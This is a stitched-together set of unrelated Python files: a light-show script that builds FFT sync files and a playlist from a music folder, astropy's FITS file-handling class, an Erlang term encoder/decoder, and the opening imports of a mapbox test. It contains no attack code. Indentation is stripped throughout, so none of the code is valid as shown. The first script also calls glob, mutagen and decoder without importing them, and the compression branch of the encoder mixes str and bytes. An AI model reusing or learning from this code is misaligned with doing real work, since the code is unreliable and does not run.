import numpy as np
import os
import sys
import wave
HOME_DIR = os.getenv("SYNCHRONIZED_LIGHTS_HOME")
if not HOME_DIR:
print("Need to setup SYNCHRONIZED_LIGHTS_HOME environment variable, "
"see readme")
sys.exit()
# hack to get the configuration_manager and fft modules to load
# from a different directory
path = list(sys.path)
# insert script location and configuration_manager location into path
sys.path.insert(0, HOME_DIR + "/py")
# import the configuration_manager and fft now that we can
import fft
import hardware_controller as hc
# get copy of configuration manager
cm = hc.cm
# get copy of configuration manager
#### reusing code from synchronized_lights.py
#### no need to reinvent the wheel
GPIOLEN = cm.hardware.gpio_len
_MIN_FREQUENCY = cm.audio_processing.min_frequency
_MAX_FREQUENCY = cm.audio_processing.max_frequency
try:
_CUSTOM_CHANNEL_MAPPING = cm.audio_processing.custom_channel_mapping
except:
_CUSTOM_CHANNEL_MAPPING = 0
try:
_CUSTOM_CHANNEL_FREQUENCIES = cm.audio_processing.custom_channel_frequencies
except:
_CUSTOM_CHANNEL_FREQUENCIES = 0
CHUNK_SIZE = 2048 # Use a multiple of 8 (move this to config)
def calculate_channel_frequency(min_frequency,
max_frequency,
custom_channel_mapping,
custom_channel_frequencies):
"""
Calculate frequency values
Calculate frequency values for each channel,
taking into account custom settings.
"""
# How many channels do we need to calculate the frequency for
if custom_channel_mapping != 0 and len(custom_channel_mapping) == GPIOLEN:
channel_length = max(custom_channel_mapping)
else:
channel_length = GPIOLEN
octaves = (np.log(max_frequency / min_frequency)) / np.log(2)
octaves_per_channel = octaves / channel_length
frequency_limits = []
frequency_store = []
frequency_limits.append(min_frequency)
if custom_channel_frequencies != 0 and (len(custom_channel_frequencies)
>= channel_length + 1):
frequency_limits = custom_channel_frequencies
else:
for i in range(1, GPIOLEN + 1):
frequency_limits.append(frequency_limits[-1]
* 10 ** (3 /
(10 * (1 / octaves_per_channel))))
for i in range(0, channel_length):
frequency_store.append((frequency_limits[i], frequency_limits[i + 1]))
# we have the frequencies now lets map them if custom mapping is defined
if custom_channel_mapping != 0 and len(custom_channel_mapping) == GPIOLEN:
frequency_map = []
for i in range(0, GPIOLEN):
mapped_channel = custom_channel_mapping[i] - 1
mapped_frequency_set = frequency_store[mapped_channel]
mapped_frequency_set_low = mapped_frequency_set[0]
mapped_frequency_set_high = mapped_frequency_set[1]
frequency_map.append(mapped_frequency_set)
return frequency_map
else:
return frequency_store
def cache_song(song_filename):
"""Play the next song from the play list (or --file argument)."""
# Initialize FFT stats
matrix = [0 for _ in range(GPIOLEN)] # get length of gpio and assign it to a variable
# Set up audio
if song_filename.endswith('.wav'):
musicfile = wave.open(song_filename, 'r')
else:
musicfile = decoder.open(song_filename)
sample_rate = musicfile.getframerate()
num_channels = musicfile.getnchannels()
fft_calc = fft.FFT(CHUNK_SIZE,
sample_rate,
GPIOLEN,
_MIN_FREQUENCY,
_MAX_FREQUENCY,
_CUSTOM_CHANNEL_MAPPING,
_CUSTOM_CHANNEL_FREQUENCIES)
song_filename = os.path.abspath(song_filename)
# create empty array for the cache_matrix
cache_matrix = np.empty(shape=[0, GPIOLEN])
cache_filename = \
os.path.dirname(song_filename) + "/." + os.path.basename(song_filename) + ".sync"
# The values 12 and 1.5 are good estimates for first time playing back
# (i.e. before we have the actual mean and standard deviations
# calculated for each channel).
mean = [12.0 for _ in range(GPIOLEN)]
std = [1.5 for _ in range(GPIOLEN)]
# Process audio song_filename
row = 0
data = musicfile.readframes(CHUNK_SIZE) # move chunk_size to configuration_manager
while data != '':
# No cache - Compute FFT in this chunk, and cache results
matrix = fft_calc.calculate_levels(data)
# Add the matrix to the end of the cache
cache_matrix = np.vstack([cache_matrix, matrix])
# Read next chunk of data from music song_filename
data = musicfile.readframes(CHUNK_SIZE)
row = row + 1
# Compute the standard deviation and mean values for the cache
for i in range(0, GPIOLEN):
std[i] = np.std([item for item in cache_matrix[:, i] if item > 0])
mean[i] = np.mean([item for item in cache_matrix[:, i] if item > 0])
# Add mean and std to the top of the cache
cache_matrix = np.vstack([mean, cache_matrix])
cache_matrix = np.vstack([std, cache_matrix])
# Save the cache using numpy savetxt
np.savetxt(cache_filename, cache_matrix)
#### end reuse
def main():
print "Do you want to generating sync files"
print
print "This could take a while if you have a lot of songs"
question = raw_input("Would you like to proceed? (Y to continue) :")
if not question in ["y", "Y"]:
sys.exit(0)
location = raw_input("Enter the path to the folder of songs:")
location += "/"
sync_list = list()
audio_file_types = ["*.mp3", "*.mp4",
"*.m4a", "*.m4b",
"*.aac", "*.ogg",
"*.flac", "*.oga",
"*.wma", "*.wav"]
for file_type in audio_file_types:
sync_list.extend(glob.glob(location + file_type))
playlistFile = open(location + "playlist", "w")
for song in sync_list:
print "Generating sync file for",song
cache_song(song)
print "cached"
metadata = mutagen.File(song, easy=True)
if "title" in metadata:
title = metadata["title"][0]
else:
title = os.path.splitext(os.path.basename(song))[0].strip()
title = title.replace("_", " ")
title = title.replace("-", " - ")
playlistFile.write(title + "\t" + song + "\n")
playlistFile.close()
print "All Finished."
print "A playlist was also generated"
print location + "playlist"
sys.path[:] = path
if __name__ == "__main__":
main()
| |
# Licensed under a 3-clause BSD style license - see PYFITS.rst
import bz2
import gzip
import errno
import http.client
import mmap
import operator
import pathlib
import io
import os
import sys
import tempfile
import warnings
import zipfile
import re
from functools import reduce
import numpy as np
from .util import (isreadable, iswritable, isfile, fileobj_open, fileobj_name,
fileobj_closed, fileobj_mode, _array_from_file,
_array_to_file, _write_string)
from astropy.utils.data import download_file, _is_url
from astropy.utils.decorators import classproperty, deprecated_renamed_argument
from astropy.utils.exceptions import AstropyUserWarning
# Maps astropy.io.fits-specific file mode names to the appropriate file
# modes to use for the underlying raw files
IO_FITS_MODES = {
'readonly': 'rb',
'copyonwrite': 'rb',
'update': 'rb+',
'append': 'ab+',
'ostream': 'wb',
'denywrite': 'rb'}
# Maps OS-level file modes to the appropriate astropy.io.fits specific mode
# to use when given file objects but no mode specified; obviously in
# IO_FITS_MODES there are overlaps; for example 'readonly' and 'denywrite'
# both require the file to be opened in 'rb' mode. But 'readonly' is the
# default behavior for such files if not otherwise specified.
# Note: 'ab' is only supported for 'ostream' which is output-only.
FILE_MODES = {
'rb': 'readonly', 'rb+': 'update',
'wb': 'ostream', 'wb+': 'update',
'ab': 'ostream', 'ab+': 'append'}
# A match indicates the file was opened in text mode, which is not allowed
TEXT_RE = re.compile(r'^[rwa]((t?\+?)|(\+?t?))$')
# readonly actually uses copyonwrite for mmap so that readonly without mmap and
# with mmap still have to same behavior with regard to updating the array. To
# get a truly readonly mmap use denywrite
# the name 'denywrite' comes from a deprecated flag to mmap() on Linux--it
# should be clarified that 'denywrite' mode is not directly analogous to the
# use of that flag; it was just taken, for lack of anything better, as a name
# that means something like "read only" but isn't readonly.
MEMMAP_MODES = {'readonly': mmap.ACCESS_COPY,
'copyonwrite': mmap.ACCESS_COPY,
'update': mmap.ACCESS_WRITE,
'append': mmap.ACCESS_COPY,
'denywrite': mmap.ACCESS_READ}
# TODO: Eventually raise a warning, and maybe even later disable the use of
# 'copyonwrite' and 'denywrite' modes unless memmap=True. For now, however,
# that would generate too many warnings for too many users. If nothing else,
# wait until the new logging system is in place.
GZIP_MAGIC = b'\x1f\x8b\x08'
PKZIP_MAGIC = b'\x50\x4b\x03\x04'
BZIP2_MAGIC = b'\x42\x5a'
def _normalize_fits_mode(mode):
if mode is not None and mode not in IO_FITS_MODES:
if TEXT_RE.match(mode):
raise ValueError(
"Text mode '{}' not supported: "
"files must be opened in binary mode".format(mode))
new_mode = FILE_MODES.get(mode)
if new_mode not in IO_FITS_MODES:
raise ValueError(f"Mode '{mode}' not recognized")
mode = new_mode
return mode
class _File:
"""
Represents a FITS file on disk (or in some other file-like object).
"""
@deprecated_renamed_argument('clobber', 'overwrite', '2.0')
def __init__(self, fileobj=None, mode=None, memmap=None, overwrite=False,
cache=True):
self.strict_memmap = bool(memmap)
memmap = True if memmap is None else memmap
if fileobj is None:
self._file = None
self.closed = False
self.binary = True
self.mode = mode
self.memmap = memmap
self.compression = None
self.readonly = False
self.writeonly = False
self.simulateonly = True
self.close_on_error = False
return
else:
self.simulateonly = False
# If fileobj is of type pathlib.Path
if isinstance(fileobj, pathlib.Path):
fileobj = str(fileobj)
elif isinstance(fileobj, bytes):
# Using bytes as filename is tricky, it's deprecated for Windows
# in Python 3.5 (because it could lead to false-positives) but
# was fixed and un-deprecated in Python 3.6.
# However it requires that the bytes object is encoded with the
# file system encoding.
# Probably better to error out and ask for a str object instead.
# TODO: This could be revised when Python 3.5 support is dropped
# See also: https://github.com/astropy/astropy/issues/6789
raise TypeError("names should be `str` not `bytes`.")
# Holds mmap instance for files that use mmap
self._mmap = None
if mode is not None and mode not in IO_FITS_MODES:
raise ValueError(f"Mode '{mode}' not recognized")
if isfile(fileobj):
objmode = _normalize_fits_mode(fileobj_mode(fileobj))
if mode is not None and mode != objmode:
raise ValueError(
"Requested FITS mode '{}' not compatible with open file "
"handle mode '{}'".format(mode, objmode))
mode = objmode
if mode is None:
mode = 'readonly'
# Handle raw URLs
if (isinstance(fileobj, str) and
mode not in ('ostream', 'append', 'update') and _is_url(fileobj)):
self.name = download_file(fileobj, cache=cache)
# Handle responses from URL requests that have already been opened
elif isinstance(fileobj, http.client.HTTPResponse):
if mode in ('ostream', 'append', 'update'):
raise ValueError(
f"Mode {mode} not supported for HTTPResponse")
fileobj = io.BytesIO(fileobj.read())
else:
self.name = fileobj_name(fileobj)
self.closed = False
self.binary = True
self.mode = mode
self.memmap = memmap
# Underlying fileobj is a file-like object, but an actual file object
self.file_like = False
# Should the object be closed on error: see
# https://github.com/astropy/astropy/issues/6168
self.close_on_error = False
# More defaults to be adjusted below as necessary
self.compression = None
self.readonly = False
self.writeonly = False
# Initialize the internal self._file object
if isfile(fileobj):
self._open_fileobj(fileobj, mode, overwrite)
elif isinstance(fileobj, str):
self._open_filename(fileobj, mode, overwrite)
else:
self._open_filelike(fileobj, mode, overwrite)
self.fileobj_mode = fileobj_mode(self._file)
if isinstance(fileobj, gzip.GzipFile):
self.compression = 'gzip'
elif isinstance(fileobj, zipfile.ZipFile):
# Reading from zip files is supported but not writing (yet)
self.compression = 'zip'
elif isinstance(fileobj, bz2.BZ2File):
self.compression = 'bzip2'
if (mode in ('readonly', 'copyonwrite', 'denywrite') or
(self.compression and mode == 'update')):
self.readonly = True
elif (mode == 'ostream' or
(self.compression and mode == 'append')):
self.writeonly = True
# For 'ab+' mode, the pointer is at the end after the open in
# Linux, but is at the beginning in Solaris.
if (mode == 'ostream' or self.compression or
not hasattr(self._file, 'seek')):
# For output stream start with a truncated file.
# For compressed files we can't really guess at the size
self.size = 0
else:
pos = self._file.tell()
self._file.seek(0, 2)
self.size = self._file.tell()
self._file.seek(pos)
if self.memmap:
if not isfile(self._file):
self.memmap = False
elif not self.readonly and not self._mmap_available:
# Test mmap.flush--see
# https://github.com/astropy/astropy/issues/968
self.memmap = False
def __repr__(self):
return '<{}.{} {}>'.format(self.__module__, self.__class__.__name__,
self._file)
# Support the 'with' statement
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def readable(self):
if self.writeonly:
return False
return isreadable(self._file)
def read(self, size=None):
if not hasattr(self._file, 'read'):
raise EOFError
try:
return self._file.read(size)
except OSError:
# On some versions of Python, it appears, GzipFile will raise an
# OSError if you try to read past its end (as opposed to just
# returning '')
if self.compression == 'gzip':
return ''
raise
def readarray(self, size=None, offset=0, dtype=np.uint8, shape=None):
"""
Similar to file.read(), but returns the contents of the underlying
file as a numpy array (or mmap'd array if memmap=True) rather than a
string.
Usually it's best not to use the `size` argument with this method, but
it's provided for compatibility.
"""
if not hasattr(self._file, 'read'):
raise EOFError
if not isinstance(dtype, np.dtype):
dtype = np.dtype(dtype)
if size and size % dtype.itemsize != 0:
raise ValueError(f'size {size} not a multiple of {dtype}')
if isinstance(shape, int):
shape = (shape,)
if not (size or shape):
warnings.warn('No size or shape given to readarray(); assuming a '
'shape of (1,)', AstropyUserWarning)
shape = (1,)
if size and not shape:
shape = (size // dtype.itemsize,)
if size and shape:
actualsize = np.prod(shape) * dtype.itemsize
if actualsize > size:
raise ValueError('size {} is too few bytes for a {} array of '
'{}'.format(size, shape, dtype))
elif actualsize < size:
raise ValueError('size {} is too many bytes for a {} array of '
'{}'.format(size, shape, dtype))
filepos = self._file.tell()
try:
if self.memmap:
if self._mmap is None:
# Instantiate Memmap array of the file offset at 0 (so we
# can return slices of it to offset anywhere else into the
# file)
access_mode = MEMMAP_MODES[self.mode]
# For reasons unknown the file needs to point to (near)
# the beginning or end of the file. No idea how close to
# the beginning or end.
# If I had to guess there is some bug in the mmap module
# of CPython or perhaps in microsoft's underlying code
# for generating the mmap.
self._file.seek(0, 0)
# This would also work:
# self._file.seek(0, 2) # moves to the end
try:
self._mmap = mmap.mmap(self._file.fileno(), 0,
access=access_mode,
offset=0)
except OSError as exc:
# NOTE: mode='readonly' results in the memory-mapping
# using the ACCESS_COPY mode in mmap so that users can
# modify arrays. However, on some systems, the OS raises
# a '[Errno 12] Cannot allocate memory' OSError if the
# address space is smaller than the file. The solution
# is to open the file in mode='denywrite', which at
# least allows the file to be opened even if the
# resulting arrays will be truly read-only.
if exc.errno == errno.ENOMEM and self.mode == 'readonly':
warnings.warn("Could not memory map array with "
"mode='readonly', falling back to "
"mode='denywrite', which means that "
"the array will be read-only",
AstropyUserWarning)
self._mmap = mmap.mmap(self._file.fileno(), 0,
access=MEMMAP_MODES['denywrite'],
offset=0)
else:
raise
return np.ndarray(shape=shape, dtype=dtype, offset=offset,
buffer=self._mmap)
else:
count = reduce(operator.mul, shape)
self._file.seek(offset)
data = _array_from_file(self._file, dtype, count)
data.shape = shape
return data
finally:
# Make sure we leave the file in the position we found it; on
# some platforms (e.g. Windows) mmaping a file handle can also
# reset its file pointer
self._file.seek(filepos)
def writable(self):
if self.readonly:
return False
return iswritable(self._file)
def write(self, string):
if hasattr(self._file, 'write'):
_write_string(self._file, string)
def writearray(self, array):
"""
Similar to file.write(), but writes a numpy array instead of a string.
Also like file.write(), a flush() or close() may be needed before
the file on disk reflects the data written.
"""
if hasattr(self._file, 'write'):
_array_to_file(array, self._file)
def flush(self):
if hasattr(self._file, 'flush'):
self._file.flush()
def seek(self, offset, whence=0):
if not hasattr(self._file, 'seek'):
return
self._file.seek(offset, whence)
pos = self._file.tell()
if self.size and pos > self.size:
warnings.warn('File may have been truncated: actual file length '
'({}) is smaller than the expected size ({})'
.format(self.size, pos), AstropyUserWarning)
def tell(self):
if not hasattr(self._file, 'tell'):
raise EOFError
return self._file.tell()
def truncate(self, size=None):
if hasattr(self._file, 'truncate'):
self._file.truncate(size)
def close(self):
"""
Close the 'physical' FITS file.
"""
if hasattr(self._file, 'close'):
self._file.close()
self._maybe_close_mmap()
# Set self._memmap to None anyways since no new .data attributes can be
# loaded after the file is closed
self._mmap = None
self.closed = True
self.close_on_error = False
def _maybe_close_mmap(self, refcount_delta=0):
"""
When mmap is in use these objects hold a reference to the mmap of the
file (so there is only one, shared by all HDUs that reference this
file).
This will close the mmap if there are no arrays referencing it.
"""
if (self._mmap is not None and
sys.getrefcount(self._mmap) == 2 + refcount_delta):
self._mmap.close()
self._mmap = None
def _overwrite_existing(self, overwrite, fileobj, closed):
"""Overwrite an existing file if ``overwrite`` is ``True``, otherwise
raise an OSError. The exact behavior of this method depends on the
_File object state and is only meant for use within the ``_open_*``
internal methods.
"""
# The file will be overwritten...
if ((self.file_like and hasattr(fileobj, 'len') and fileobj.len > 0) or
(os.path.exists(self.name) and os.path.getsize(self.name) != 0)):
if overwrite:
if self.file_like and hasattr(fileobj, 'truncate'):
fileobj.truncate(0)
else:
if not closed:
fileobj.close()
os.remove(self.name)
else:
raise OSError(f"File {self.name!r} already exists.")
def _try_read_compressed(self, obj_or_name, magic, mode, ext=''):
"""Attempt to determine if the given file is compressed"""
if ext == '.gz' or magic.startswith(GZIP_MAGIC):
if mode == 'append':
raise OSError("'append' mode is not supported with gzip files."
"Use 'update' mode instead")
# Handle gzip files
kwargs = dict(mode=IO_FITS_MODES[mode])
if isinstance(obj_or_name, str):
kwargs['filename'] = obj_or_name
else:
kwargs['fileobj'] = obj_or_name
self._file = gzip.GzipFile(**kwargs)
self.compression = 'gzip'
elif ext == '.zip' or magic.startswith(PKZIP_MAGIC):
# Handle zip files
self._open_zipfile(self.name, mode)
self.compression = 'zip'
elif ext == '.bz2' or magic.startswith(BZIP2_MAGIC):
# Handle bzip2 files
if mode in ['update', 'append']:
raise OSError("update and append modes are not supported "
"with bzip2 files")
# bzip2 only supports 'w' and 'r' modes
bzip2_mode = 'w' if mode == 'ostream' else 'r'
self._file = bz2.BZ2File(obj_or_name, mode=bzip2_mode)
self.compression = 'bzip2'
return self.compression is not None
def _open_fileobj(self, fileobj, mode, overwrite):
"""Open a FITS file from a file object (including compressed files)."""
closed = fileobj_closed(fileobj)
fmode = fileobj_mode(fileobj) or IO_FITS_MODES[mode]
if mode == 'ostream':
self._overwrite_existing(overwrite, fileobj, closed)
if not closed:
self._file = fileobj
elif isfile(fileobj):
self._file = fileobj_open(self.name, IO_FITS_MODES[mode])
# Attempt to determine if the file represented by the open file object
# is compressed
try:
# We need to account for the possibility that the underlying file
# handle may have been opened with either 'ab' or 'ab+', which
# means that the current file position is at the end of the file.
if mode in ['ostream', 'append']:
self._file.seek(0)
magic = self._file.read(4)
# No matter whether the underlying file was opened with 'ab' or
# 'ab+', we need to return to the beginning of the file in order
# to properly process the FITS header (and handle the possibility
# of a compressed file).
self._file.seek(0)
except (OSError,OSError):
return
self._try_read_compressed(fileobj, magic, mode)
def _open_filelike(self, fileobj, mode, overwrite):
"""Open a FITS file from a file-like object, i.e. one that has
read and/or write methods.
"""
self.file_like = True
self._file = fileobj
if fileobj_closed(fileobj):
raise OSError("Cannot read from/write to a closed file-like "
"object ({!r}).".format(fileobj))
if isinstance(fileobj, zipfile.ZipFile):
self._open_zipfile(fileobj, mode)
# We can bypass any additional checks at this point since now
# self._file points to the temp file extracted from the zip
return
# If there is not seek or tell methods then set the mode to
# output streaming.
if (not hasattr(self._file, 'seek') or
not hasattr(self._file, 'tell')):
self.mode = mode = 'ostream'
if mode == 'ostream':
self._overwrite_existing(overwrite, fileobj, False)
# Any "writeable" mode requires a write() method on the file object
if (self.mode in ('update', 'append', 'ostream') and
not hasattr(self._file, 'write')):
raise OSError("File-like object does not have a 'write' "
"method, required for mode '{}'.".format(self.mode))
# Any mode except for 'ostream' requires readability
if self.mode != 'ostream' and not hasattr(self._file, 'read'):
raise OSError("File-like object does not have a 'read' "
"method, required for mode {!r}.".format(self.mode))
def _open_filename(self, filename, mode, overwrite):
"""Open a FITS file from a filename string."""
if mode == 'ostream':
self._overwrite_existing(overwrite, None, True)
if os.path.exists(self.name):
with fileobj_open(self.name, 'rb') as f:
magic = f.read(4)
else:
magic = b''
ext = os.path.splitext(self.name)[1]
if not self._try_read_compressed(self.name, magic, mode, ext=ext):
self._file = fileobj_open(self.name, IO_FITS_MODES[mode])
self.close_on_error = True
# Make certain we're back at the beginning of the file
# BZ2File does not support seek when the file is open for writing, but
# when opening a file for write, bz2.BZ2File always truncates anyway.
if not (isinstance(self._file, bz2.BZ2File) and mode == 'ostream'):
self._file.seek(0)
@classproperty(lazy=True)
def _mmap_available(cls):
"""Tests that mmap, and specifically mmap.flush works. This may
be the case on some uncommon platforms (see
https://github.com/astropy/astropy/issues/968).
If mmap.flush is found not to work, ``self.memmap = False`` is
set and a warning is issued.
"""
tmpfd, tmpname = tempfile.mkstemp()
try:
# Windows does not allow mappings on empty files
os.write(tmpfd, b' ')
os.fsync(tmpfd)
try:
mm = mmap.mmap(tmpfd, 1, access=mmap.ACCESS_WRITE)
except OSError as exc:
warnings.warn('Failed to create mmap: {}; mmap use will be '
'disabled'.format(str(exc)), AstropyUserWarning)
del exc
return False
try:
mm.flush()
except OSError:
warnings.warn('mmap.flush is unavailable on this platform; '
'using mmap in writeable mode will be disabled',
AstropyUserWarning)
return False
finally:
mm.close()
finally:
os.close(tmpfd)
os.remove(tmpname)
return True
def _open_zipfile(self, fileobj, mode):
"""Limited support for zipfile.ZipFile objects containing a single
a file. Allows reading only for now by extracting the file to a
tempfile.
"""
if mode in ('update', 'append'):
raise OSError(
"Writing to zipped fits files is not currently "
"supported")
if not isinstance(fileobj, zipfile.ZipFile):
zfile = zipfile.ZipFile(fileobj)
close = True
else:
zfile = fileobj
close = False
namelist = zfile.namelist()
if len(namelist) != 1:
raise OSError(
"Zip files with multiple members are not supported.")
self._file = tempfile.NamedTemporaryFile(suffix='.fits')
self._file.write(zfile.read(namelist[0]))
if close:
zfile.close()
# We just wrote the contents of the first file in the archive to a new
# temp file, which now serves as our underlying file object. So it's
# necessary to reset the position back to the beginning
self._file.seek(0)
| |
from __future__ import division
import struct
import zlib
from erlastic.constants import *
from erlastic.types import *
__all__ = ["ErlangTermEncoder", "ErlangTermDecoder", "EncodingError"]
class EncodingError(Exception):
pass
class ErlangTermDecoder(object):
def __init__(self):
# Cache decode functions to avoid having to do a getattr
self.decoders = {}
for k in self.__class__.__dict__:
v = getattr(self, k)
if callable(v) and k.startswith('decode_'):
try: self.decoders[int(k.split('_')[1])] = v
except: pass
def decode(self, buf, offset=0):
version = buf[offset]
if version != FORMAT_VERSION:
raise EncodingError("Bad version number. Expected %d found %d" % (FORMAT_VERSION, version))
return self.decode_part(buf, offset+1)[0]
def decode_part(self, buf, offset=0):
return self.decoders[buf[offset]](buf, offset+1)
def decode_97(self, buf, offset):
"""SMALL_INTEGER_EXT"""
return buf[offset], offset+1
def decode_98(self, buf, offset):
"""INTEGER_EXT"""
return struct.unpack(">l", buf[offset:offset+4])[0], offset+4
def decode_99(self, buf, offset):
"""FLOAT_EXT"""
return float(buf[offset:offset+31].split(b'\x00', 1)[0]), offset+31
def decode_70(self, buf, offset):
"""NEW_FLOAT_EXT"""
return struct.unpack(">d", buf[offset:offset+8])[0], offset+8
def decode_100(self, buf, offset):
"""ATOM_EXT"""
atom_len = struct.unpack(">H", buf[offset:offset+2])[0]
atom = buf[offset+2:offset+2+atom_len]
return self.convert_atom(atom), offset+atom_len+2
def decode_115(self, buf, offset):
"""SMALL_ATOM_EXT"""
atom_len = buf[offset]
atom = buf[offset+1:offset+1+atom_len]
return self.convert_atom(atom), offset+atom_len+1
def decode_104(self, buf, offset):
"""SMALL_TUPLE_EXT"""
arity = buf[offset]
offset += 1
items = []
for i in range(arity):
val, offset = self.decode_part(buf, offset)
items.append(val)
return tuple(items), offset
def decode_105(self, buf, offset):
"""LARGE_TUPLE_EXT"""
arity = struct.unpack(">L", buf[offset:offset+4])[0]
offset += 4
items = []
for i in range(arity):
val, offset = self.decode_part(buf, offset)
items.append(val)
return tuple(items), offset
def decode_106(self, buf, offset):
"""NIL_EXT"""
return [], offset
def decode_107(self, buf, offset):
"""STRING_EXT"""
length = struct.unpack(">H", buf[offset:offset+2])[0]
st = buf[offset+2:offset+2+length]
return st, offset+2+length
def decode_108(self, buf, offset):
"""LIST_EXT"""
length = struct.unpack(">L", buf[offset:offset+4])[0]
offset += 4
items = []
for i in range(length):
val, offset = self.decode_part(buf, offset)
items.append(val)
tail, offset = self.decode_part(buf, offset)
if tail != []:
# TODO: Not sure what to do with the tail
raise NotImplementedError("Lists with non empty tails are not supported")
return items, offset
def decode_109(self, buf, offset):
"""BINARY_EXT"""
length = struct.unpack(">L", buf[offset:offset+4])[0]
return buf[offset+4:offset+4+length], offset+4+length
def decode_110(self, buf, offset):
"""SMALL_BIG_EXT"""
n = buf[offset]
offset += 1
return self.decode_bigint(n, buf, offset)
def decode_111(self, buf, offset):
"""LARGE_BIG_EXT"""
n = struct.unpack(">L", buf[offset:offset+4])[0]
offset += 4
return self.decode_bigint(n, buf, offset)
def decode_bigint(self, n, buf, offset):
sign = buf[offset]
offset += 1
b = 1
val = 0
for i in range(n):
val += buf[offset] * b
b <<= 8
offset += 1
if sign != 0:
val = -val
return val, offset
def decode_101(self, buf, offset):
"""REFERENCE_EXT"""
node, offset = self.decode_part(buf, offset)
if not isinstance(node, Atom):
raise EncodingError("Expected atom while parsing REFERENCE_EXT, found %r instead" % node)
reference_id, creation = struct.unpack(">LB", buf[offset:offset+5])
return Reference(node, [reference_id], creation), offset+5
def decode_114(self, buf, offset):
"""NEW_REFERENCE_EXT"""
id_len = struct.unpack(">H", buf[offset:offset+2])[0]
node, offset = self.decode_part(buf, offset+2)
if not isinstance(node, Atom):
raise EncodingError("Expected atom while parsing NEW_REFERENCE_EXT, found %r instead" % node)
creation = buf[offset]
reference_id = struct.unpack(">%dL" % id_len, buf[offset+1:offset+1+4*id_len])
return Reference(node, reference_id, creation), offset+1+4*id_len
def decode_102(self, buf, offset):
"""PORT_EXT"""
node, offset = self.decode_part(buf, offset)
if not isinstance(node, Atom):
raise EncodingError("Expected atom while parsing PORT_EXT, found %r instead" % node)
port_id, creation = struct.unpack(">LB", buf[offset:offset+5])
return Port(node, port_id, creation), offset+5
def decode_103(self, buf, offset):
"""PID_EXT"""
node, offset = self.decode_part(buf, offset)
if not isinstance(node, Atom):
raise EncodingError("Expected atom while parsing PID_EXT, found %r instead" % node)
pid_id, serial, creation = struct.unpack(">LLB", buf[offset:offset+9])
return PID(node, pid_id, serial, creation), offset+9
def decode_113(self, buf, offset):
"""EXPORT_EXT"""
module, offset = self.decode_part(buf, offset)
if not isinstance(module, Atom):
raise EncodingError("Expected atom while parsing EXPORT_EXT, found %r instead" % module)
function, offset = self.decode_part(buf, offset)
if not isinstance(function, Atom):
raise EncodingError("Expected atom while parsing EXPORT_EXT, found %r instead" % function)
arity, offset = self.decode_part(buf, offset)
if not isinstance(arity, int):
raise EncodingError("Expected integer while parsing EXPORT_EXT, found %r instead" % arity)
return Export(module, function, arity), offset+1
def decode_80(self, buf, offset):
"""Compressed term"""
usize = struct.unpack(">L", buf[offset:offset+4])[0]
buf = zlib.decompress(buf[offset+4:offset+4+usize])
return self.decode_part(buf, 0)
def convert_atom(self, atom):
if atom == b"true":
return True
elif atom == b"false":
return False
elif atom == b"none":
return None
return Atom(atom.decode('latin-1'))
class ErlangTermEncoder(object):
def __init__(self, encoding="utf-8", unicode_type="binary"):
self.encoding = encoding
self.unicode_type = unicode_type
def encode(self, obj, compressed=False):
import sys
import pprint
#pprint.pprint(self.encode_part(obj),stream=sys.stderr)
ubuf = b"".join(self.encode_part(obj))
if compressed is True:
compressed = 6
if not (compressed is False \
or (isinstance(compressed, int) \
and compressed >= 0 and compressed <= 9)):
raise TypeError("compressed must be True, False or "
"an integer between 0 and 9")
if compressed:
cbuf = zlib.compress(ubuf, compressed)
if len(cbuf) < len(ubuf):
usize = struct.pack(">L", len(ubuf))
ubuf = "".join([COMPRESSED, usize, cbuf])
return bytes([FORMAT_VERSION]) + ubuf
def encode_part(self, obj):
if obj is False:
return [bytes([ATOM_EXT]), struct.pack(">H", 5), b"false"]
elif obj is True:
return [bytes([ATOM_EXT]), struct.pack(">H", 4), b"true"]
elif obj is None:
return [bytes([ATOM_EXT]), struct.pack(">H", 4), b"none"]
elif isinstance(obj, int):
if 0 <= obj <= 255:
return [bytes([SMALL_INTEGER_EXT,obj])]
elif -2147483648 <= obj <= 2147483647:
return [bytes([INTEGER_EXT]), struct.pack(">l", obj)]
else:
sign = obj < 0
obj = abs(obj)
big_buf = []
while obj > 0:
big_buf.append(obj & 0xff)
obj >>= 8
if len(big_buf) < 256:
return [bytes([SMALL_BIG_EXT,len(big_buf),sign]),bytes(big_buf)]
else:
return [bytes([LARGE_BIG_EXT]), struct.pack(">L", len(big_buf)), bytes([sign]), bytes(big_buf)]
elif isinstance(obj, float):
floatstr = ("%.20e" % obj).encode('ascii')
return [bytes([FLOAT_EXT]), floatstr + b"\x00"*(31-len(floatstr))]
elif isinstance(obj, Atom):
st = obj.encode('latin-1')
return [bytes([ATOM_EXT]), struct.pack(">H", len(st)), st]
elif isinstance(obj, str):
st = obj.encode('utf-8')
return [bytes([BINARY_EXT]), struct.pack(">L", len(st)), st]
elif isinstance(obj, bytes):
return [bytes([BINARY_EXT]), struct.pack(">L", len(obj)), obj]
elif isinstance(obj, tuple):
n = len(obj)
if n < 256:
buf = [bytes([SMALL_TUPLE_EXT,n])]
else:
buf = [bytes([LARGE_TUPLE_EXT]), struct.pack(">L", n)]
for item in obj:
buf += self.encode_part(item)
return buf
elif obj == []:
return [bytes([NIL_EXT])]
elif isinstance(obj, list):
buf = [bytes([LIST_EXT]), struct.pack(">L", len(obj))]
for item in obj:
buf += self.encode_part(item)
buf.append(bytes([NIL_EXT])) # list tail - no such thing in Python
return buf
elif isinstance(obj, Reference):
return [bytes([NEW_REFERENCE_EXT]),
struct.pack(">H", len(obj.ref_id)),
bytes([ATOM_EXT]), struct.pack(">H", len(obj.node)), obj.node.encode('latin-1'),
bytes([obj.creation]), struct.pack(">%dL" % len(obj.ref_id), *obj.ref_id)]
elif isinstance(obj, Port):
return [bytes([PORT_EXT]),
bytes([ATOM_EXT]), struct.pack(">H", len(obj.node)), obj.node.encode('latin-1'),
struct.pack(">LB", obj.port_id, obj.creation)]
elif isinstance(obj, PID):
return [bytes([PID_EXT]),
bytes([ATOM_EXT]), struct.pack(">H", len(obj.node)), obj.node.encode('latin-1'),
struct.pack(">LLB", obj.pid_id, obj.serial, obj.creation)]
elif isinstance(obj, Export):
return [bytes([EXPORT_EXT]),
bytes([ATOM_EXT]), struct.pack(">H", len(obj.module)), obj.module.encode('latin-1'),
bytes([ATOM_EXT]), struct.pack(">H", len(obj.function)), obj.function.encode('latin-1'),
bytes([SMALL_INTEGER_EXT,obj.arity])]
else:
raise NotImplementedError("Unable to serialize %r" % obj)
| |
import base64
import json
import responses
import pytest
import mapbox
